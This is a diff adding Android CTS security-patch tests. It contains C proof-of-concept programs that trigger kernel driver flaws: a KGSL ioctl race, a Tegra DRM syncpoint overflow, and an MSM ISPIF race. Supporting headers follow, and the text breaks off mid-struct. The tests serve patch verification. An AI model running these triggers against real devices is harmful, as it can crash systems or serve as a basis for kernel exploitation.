@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
